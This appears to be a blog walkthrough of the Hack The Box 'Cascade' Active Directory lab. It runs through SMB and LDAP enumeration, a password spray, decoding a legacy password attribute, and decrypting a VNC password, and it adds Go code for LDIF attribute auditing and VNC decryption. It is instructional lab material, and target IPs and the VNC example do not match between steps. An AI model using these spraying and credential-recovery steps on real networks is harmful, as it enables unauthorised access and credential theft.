AD Attack Walkthrough 6 (decrypt VNC)
[Table of Contents]
1. CASE 8 - HTB Cascade
[Attack process summary]
1. Check ports
DNS 53, kerberos 88, SMB 445, ldap 389
Web Server
![](https://blog.kakaocdn.net/dn/c4hKhj/btrMePScVVE/NDrBh4nubKoTkcDdLdXmQ0/img.png)
2. Register in the hosts file
Once the domain is identified, add it to the hosts file right away
10.10.10.182 cascade.local cascade
3. Set Enumeration Target
1) SMB
- Usernames/groups?
- File shares
- Bruteforce
2) LDAP
- Usernames
- Other info
3-1) SMB enum
: Usernames & Groups
# rpcclient -U '' 192.168.137.131
> enumdomusers
![](https://blog.kakaocdn.net/dn/MJ33N/btrMgQizkCZ/mcNMet2J4vdDe9qKoxfUS1/img.png)
Copy the whole output and turn it into a list
# cat list | awk -F\[ '{print $2}' | awk -F\] '{print $1}' > users.lst
![](https://blog.kakaocdn.net/dn/Qg9ld/btrMdNAW6G5/g26MFHFAwK3KMDzs2KKzak/img.png)
# rpcclient -U '' 192.168.137.131
> querydispinfo
![](https://blog.kakaocdn.net/dn/cUEQHz/btrL9YCHI0D/dR2sAtR0e7hPDKKUk5Niak/img.png)
> Nothing much here
: File Shares
# crackmapexec smb 192.168.137.131 --shares
# crackmapexec smb 192.168.137.131 -u '' --shares
# crackmapexec smb 192.168.137.131 -u '' -p '' --shares
![](https://blog.kakaocdn.net/dn/dfm2ud/btrMd7sjiR1/xv7jVxxwkkuI2uJ58ne001/img.png)
# smbclient -L //192.168.137.131
# smbclient -L //192.168.137.131 -U ''
> doesn't look like we can enumerate file shares
3-2) LDAP
: Check when the box or the usernames were created
# rpcclient -U '' 192.168.137.131
> querydispinfo2
> queryuser 0x452
![](https://blog.kakaocdn.net/dn/kIMSY/btrMgRPi9v0/5UCsYgjZSvg9CwdmYsGUE1/img.png)
> Check recently logged-on user info (Logon Time)
![](https://blog.kakaocdn.net/dn/noD2s/btrMcPeZRJm/NOG2rLJoSu6PynJ89wkqO1/img.png)
> Check the month the password was last set, and look for a theme
: season, month, etc.
: Generate a password list
![](https://blog.kakaocdn.net/dn/Vhga0/btrMd6AbMgJ/0RgY6vwiCmLJz5NwwURzb1/img.png)
# mutate passwords
# hashcat --force passwords -r /usr/share/hashcat/rules/best64.rule --stdout > pass.lst
# sort -u pass.lst > passwords.lst
: Bruteforce
1. Check password policy
# crackmapexec smb 192.168.139.131 --pass-pol
![](https://blog.kakaocdn.net/dn/butQJY/btrMeQDzZNQ/XszeMFZvZSGkpAe9gPX1O0/img.png)
> Account Lockout Threshold : None
Safe to run the spray without worrying about lockouts
# crackmapexec smb 192.168.139.131 -u users.lst -p passwords.lst
![](https://blog.kakaocdn.net/dn/mVPgD/btrMdRpLloj/o6RXsxHErysnbktawV3dzk/img.png)
: LDAP
# ldapsearch -x -h 192.168.138.131 -s base namingcontexts
![](https://blog.kakaocdn.net/dn/byTRI3/btrMd2khwuH/iFpkjk84hpamhkX5eVTtZk/img.png)
# ldapsearch -x -h 192.168.138.131 -s sub -b 'DC=cascade,DC=local' > results
# cat results | awk '{print $1}' | sort | uniq -c | sort -nr
# cat results | awk '{print $1}' | sort | uniq -c | sort -nr | grep ':'
# cat results | awk '{print $1}' | sort | uniq -c | sort -nr | grep ':' > tmp
# less tmp
In less, search with /cascadeLegacyPwd
![](https://blog.kakaocdn.net/dn/d8ICgm/btrMeiNTmKQ/VVzR1GZ1nvJvrTwcOl06G0/img.png)
![](https://blog.kakaocdn.net/dn/d6iITW/btrMgRu0pYF/vLgfe8ELBcg8808XKRaP9k/img.png)
![](https://blog.kakaocdn.net/dn/bUr9mi/btrMdMotUzq/z07WcKQvst0qHbte1EGSEK/img.png)
> Ryan Thompson,
sAMAccountName : r.thompson
cascadeLegacyPwd : clk0bjVldmE=
> base64 -d it, then try to log in
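A Go version of the attribute-frequency pipeline above, added here as an illustration (it is not from the original post or from HTB). It parses a constructed ldapsearch-style LDIF excerpt whose only value taken from the page is the cascadeLegacyPwd string, counts attribute names the way `awk | sort | uniq -c | sort -nr` does so that one-off custom attributes stand out, and base64-decodes that attribute for every account carrying it. This is the same audit you would run against your own directory export to find credential material left behind in non-standard attributes after a migration.

```go
package main

import (
	"bufio"
	"encoding/base64"
	"fmt"
	"sort"
	"strings"
)

// sampleLDIF is a constructed excerpt shaped like the output of
// `ldapsearch -x -s sub -b 'DC=cascade,DC=local'`. The cascadeLegacyPwd value is the
// one quoted on the page; the DNs, group names and other values are made up.
const sampleLDIF = `# extended LDIF
#
# LDAPv3
# base <DC=cascade,DC=local> with scope subtree
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: user
cn: Ryan Thompson
sAMAccountName: r.thompson
memberOf: CN=ExampleGroupA,OU=Groups,OU=UK,DC=cascade,DC=local
cascadeLegacyPwd: clk0bjVldmE=

dn: CN=Steve Smith,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: user
cn: Steve Smith
sAMAccountName: s.smith
memberOf: CN=ExampleGroupB,OU=Groups,OU=UK,
 DC=cascade,DC=local

# search result
search: 2
result: 0 Success
`

// Entry is one LDIF record: its DN plus attribute name -> values.
type Entry struct {
	DN    string
	Attrs map[string][]string
}

// ParseLDIF unfolds continuation lines, skips comments, splits records on blank
// lines and drops the trailing "search:/result:" pseudo-record ldapsearch appends.
func ParseLDIF(text string) []Entry {
	var lines []string
	sc := bufio.NewScanner(strings.NewReader(text))
	for sc.Scan() {
		l := sc.Text()
		if strings.HasPrefix(l, " ") && len(lines) > 0 {
			lines[len(lines)-1] += l[1:] // a leading space joins the line to the one above
			continue
		}
		lines = append(lines, l)
	}
	var entries []Entry
	var cur *Entry
	flush := func() {
		if cur != nil && cur.DN != "" {
			entries = append(entries, *cur)
		}
		cur = nil
	}
	for _, l := range lines {
		if l == "" {
			flush()
			continue
		}
		if strings.HasPrefix(l, "#") {
			continue
		}
		name, val, ok := strings.Cut(l, ":")
		if !ok {
			continue
		}
		if strings.HasPrefix(val, ":") { // "attr:: <b64>" is LDIF's own encoding for binary values
			if raw, err := base64.StdEncoding.DecodeString(strings.TrimSpace(val[1:])); err == nil {
				val = string(raw)
			} else {
				val = strings.TrimSpace(val[1:])
			}
		} else {
			val = strings.TrimSpace(val)
		}
		if name == "dn" {
			flush()
			cur = &Entry{DN: val, Attrs: map[string][]string{}}
			continue
		}
		if cur == nil {
			cur = &Entry{Attrs: map[string][]string{}}
		}
		cur.Attrs[name] = append(cur.Attrs[name], val)
	}
	flush()
	return entries
}

// AttributeCounts replicates `awk '{print $1}' | sort | uniq -c | sort -nr | grep ':'`:
// how often each attribute name occurs across all entries.
func AttributeCounts(entries []Entry) map[string]int {
	counts := map[string]int{}
	for _, e := range entries {
		for name, vals := range e.Attrs {
			counts[name] += len(vals)
		}
	}
	return counts
}

// RarestAttributes lists attribute names by ascending frequency; one-off custom
// attributes such as cascadeLegacyPwd surface at the top of this list.
func RarestAttributes(counts map[string]int, n int) []string {
	names := make([]string, 0, len(counts))
	for k := range counts {
		names = append(names, k)
	}
	sort.Slice(names, func(i, j int) bool {
		if counts[names[i]] != counts[names[j]] {
			return counts[names[i]] < counts[names[j]]
		}
		return names[i] < names[j]
	})
	if n < len(names) {
		names = names[:n]
	}
	return names
}

// DecodeAttribute returns sAMAccountName -> base64-decoded value of attr for every
// entry carrying it (the manual `base64 -d` step on the page, done for all hits).
func DecodeAttribute(entries []Entry, attr string) map[string]string {
	out := map[string]string{}
	for _, e := range entries {
		vals, ok := e.Attrs[attr]
		if !ok {
			continue
		}
		who := e.DN
		if s := e.Attrs["sAMAccountName"]; len(s) > 0 {
			who = s[0]
		}
		for _, v := range vals {
			raw, err := base64.StdEncoding.DecodeString(v)
			if err != nil {
				out[who] = v // not base64: keep the raw value so it is still reviewed
				continue
			}
			out[who] = string(raw)
		}
	}
	return out
}

func main() {
	entries := ParseLDIF(sampleLDIF)
	counts := AttributeCounts(entries)
	for _, name := range RarestAttributes(counts, 3) {
		fmt.Printf("%4d %s\n", counts[name], name)
	}
	for user, pw := range DecodeAttribute(entries, "cascadeLegacyPwd") {
		fmt.Printf("%s -> %s\n", user, pw)
	}
}
```

Against a real export, replace sampleLDIF with the contents of the `results` file from the ldapsearch command above; the frequency list makes a single custom attribute obvious even in a directory with thousands of objects.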
# crackmapexec smb 192.168.138.131 -u r.thompson -p rY4n5eva
# crackmapexec smb 192.168.138.131 -u r.thompson -p rY4n5eva --shares
# crackmapexec smb 192.168.138.131 -u r.thompson -p rY4n5eva -M spider_plus
![](https://blog.kakaocdn.net/dn/QVJk5/btrMeGnwEUv/YHHC4auVyiFbMub5JrnX60/img.png)
![](https://blog.kakaocdn.net/dn/buWaZO/btrMaeSRLP2/AiKyE1lBLcHWISHUJ40dl1/img.png)
> The Data / print shares were created manually in AD, so they need to be checked
(exclude ADMIN and NETLOGON; SYSVOL can reveal group policy info)
![](https://blog.kakaocdn.net/dn/d0OSos/btrMcSW3LFW/lpCW5RDFMjheND2V42uv20/img.png)
: mount shares
# mkdir /mnt/data
# mount -t cifs -o 'user=r.thompson,password=rY4n5eva' //192.168.137.131/data /mnt/data
# mkdir /mnt/netlogon
# mount -t cifs -o 'user=r.thompson,password=rY4n5eva' //192.168.137.131/netlogon /mnt/netlogon
![](https://blog.kakaocdn.net/dn/bQuQia/btrMecUx9Qt/iZRnLfDdI4ARhJfaCC4Ack/img.png)
> Check netlogon
![](https://blog.kakaocdn.net/dn/bVLBhY/btrMd1MuNuN/zKmcgwTyMe0F5XNYcnHON0/img.png)
> Found a new share \\CASC-DC1\Audit, but
mounting it gives permission denied
> Check data
# find .
# find . -type f
![](https://blog.kakaocdn.net/dn/bvg3Pz/btrMedMDmvT/jpwXtkvgMktWKm6SLTyDjk/img.png)
![](https://blog.kakaocdn.net/dn/bI0njt/btrMffiQ5j7/ylrhle2HQsuC9gISgc5vnK/img.png)
> The password is stored in the registry as a VNC hex value
$> msfconsole
msf5 > irb
[*] Starting IRB shell...
[*] You are in the "framework" object
>> fixedkey = "\x17\x52\x6b\x06\x23\x4e\x58\x07"
=> "\u0017Rk\u0006#NX\a"
>> require 'rex/proto/rfb'
=> true
>> Rex::Proto::RFB::Cipher.decrypt ["D7A514D8C556AADE"].pack('H*'), fixedkey
=> "Secure!\x00"
>>
![](https://blog.kakaocdn.net/dn/bMyObs/btrMdMWnYyh/goMM6LsLfbb2lwWO0kAUsk/img.png)
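The same decryption as the irb session above, written in Go as an added example (it is not code from the post or from Metasploit). It uses the fixed key the page feeds to Rex, bit-reverses it because VNC's DES routine does that to every key byte internally while Go's standard crypto/des does not, and accepts both the bare hex string and the `hex:d7,a5,...` form a .reg export produces. The sample blob is the one from the irb session; nothing else is taken from the box. The point for a defender is that a VNC password found in a share or a registry export is a plaintext credential, because there is no secret in this scheme to begin with.

```go
package main

import (
	"crypto/des"
	"encoding/hex"
	"errors"
	"fmt"
	"math/bits"
	"strings"
)

// vncFixedKey is the well-known constant DES key baked into VNC servers; these are
// the same bytes the page passes to Rex::Proto::RFB::Cipher.decrypt as fixedkey.
var vncFixedKey = [8]byte{0x17, 0x52, 0x6b, 0x06, 0x23, 0x4e, 0x58, 0x07}

// desKey returns the key in the byte order a standard DES implementation expects.
// VNC's own DES routine reverses the bits of every key byte first (Rex does this
// inside Cipher.decrypt), so Go's crypto/des needs the pre-reversed form.
func desKey() []byte {
	k := make([]byte, len(vncFixedKey))
	for i, b := range vncFixedKey {
		k[i] = bits.Reverse8(b)
	}
	return k
}

// ParseRegHex accepts either a plain hex string ("D7A514D8C556AADE") or the
// reg-export form ("hex:d7,a5,14,d8,c5,56,aa,de") and returns the raw bytes.
func ParseRegHex(s string) ([]byte, error) {
	s = strings.ToLower(strings.TrimSpace(s))
	s = strings.TrimPrefix(s, "hex:")
	s = strings.ReplaceAll(s, ",", "")
	s = strings.ReplaceAll(s, " ", "")
	return hex.DecodeString(s)
}

// DecryptVNCPassword decrypts a stored VNC password blob (registry value or
// ~/.vnc/passwd contents). Stored passwords are one or more 8-byte DES-ECB blocks
// under the fixed key, NUL-padded, so the plaintext is always recoverable.
func DecryptVNCPassword(stored string) (string, error) {
	ct, err := ParseRegHex(stored)
	if err != nil {
		return "", err
	}
	if len(ct) == 0 || len(ct)%des.BlockSize != 0 {
		return "", errors.New("VNC password blob must be a non-empty multiple of 8 bytes")
	}
	block, err := des.NewCipher(desKey())
	if err != nil {
		return "", err
	}
	pt := make([]byte, len(ct))
	for off := 0; off < len(ct); off += des.BlockSize {
		// ECB: every block is decrypted independently under the same key
		block.Decrypt(pt[off:off+des.BlockSize], ct[off:off+des.BlockSize])
	}
	return strings.TrimRight(string(pt), "\x00"), nil
}

func main() {
	// Sample blob taken from the irb session on the page; expected plaintext "Secure!".
	for _, blob := range []string{"D7A514D8C556AADE", "hex:d7,a5,14,d8,c5,56,aa,de"} {
		pw, err := DecryptVNCPassword(blob)
		if err != nil {
			fmt.Println("error:", err)
			continue
		}
		fmt.Printf("%s -> %q\n", blob, pw)
	}
}
```

The bit-reversed key comes out as e84ad660c4721ae0, which is the key you would pass to any standard DES tool for the same job; the Rex call on the page hides that step by mangling the key itself.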
: Try to log in
# crackmapexec smb 192.168.137.131 -u users.lst -p sT333ve2
> Find which user the password belongs to
# crackmapexec smb 192.168.137.131 -u s.smith -p sT333ve2
> Check whether it shows Pwn3d!
# crackmapexec smb 192.168.137.131 -u s.smith -p sT333ve2 -M spider_plus
> Check whether there is any additional info
# evil-winrm -i 192.168.137.131 -u s.smith -p sT333ve2
> Tried because Pwn3d! showed up
![](https://blog.kakaocdn.net/dn/cOcU1I/btrMePScVNG/P8hviL7HWkoVNikWWfjQf0/img.png)
To be continued tomorrow